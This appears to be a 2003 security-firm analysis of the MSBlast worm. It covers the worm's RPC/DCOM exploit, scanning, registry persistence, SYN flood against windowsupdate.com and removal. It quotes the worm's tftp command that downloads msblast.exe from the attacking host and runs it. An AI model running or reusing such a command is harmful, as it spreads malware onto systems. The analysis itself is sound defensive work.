Contact Us
MSBlast Worm Analysis
- URL: http://www.secureworks.com/research/threats/msblast
- Date: August 11, 2003
- Author: Joe Stewart
On the afternoon of August 11, 2003, SecureWorks' analysts noted a sharp increase in the amount of scanning for the recent RPC/DCOM exploit. At the same time, honeypots monitored by SecureWorks' research team captured a worm in the wild, spreading prolifically.
The worm takes advantage of the vulnerability described in CERT Advisories VU#568148, CA-2003-16H, and CA2003-19. The exploit code is derived from the HD Moore dcom.c exploit, and uses the same command shell port. Upon successfully exploiting a host, the following commands are run:
tftp -i x.x.x.x GET msblast.exe start msblast.exe msblast.exe
The worm has its own tftp server built in, so x.x.x.x will be the IP address of the attacking host. The worm has a bug in the code that determines its own IP address; under certain conditions it will erroneously send commands to tftp its executable from the IP address "0.0.0.0". Under these conditions, the host will continue to scan, but will not be able to propagate.
The msblast.exe executable creates the following registry key to run at boot:
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\windows auto update = 'msblast.exe'
The worm will begin to scan the local class b subnet, and will also generate a random address to begin scanning at, then will sequentially scan from that point forward incrementing by host address, class c, class b and class a. It can scan hosts at a rate of 20 per second. Upon finding a vulnerable host however, it may take up to 15 seconds to infect the host.
The name "MSBlast" is well suited; the worm checks to see if the date is greater than or equal to August 16 - If so it will begin to synflood windowsupdate.com using spoofed source IP addresses.
Removal of the worm is trivial; use the task manager to kill the msblast.exe process, then remove the associated registry key.
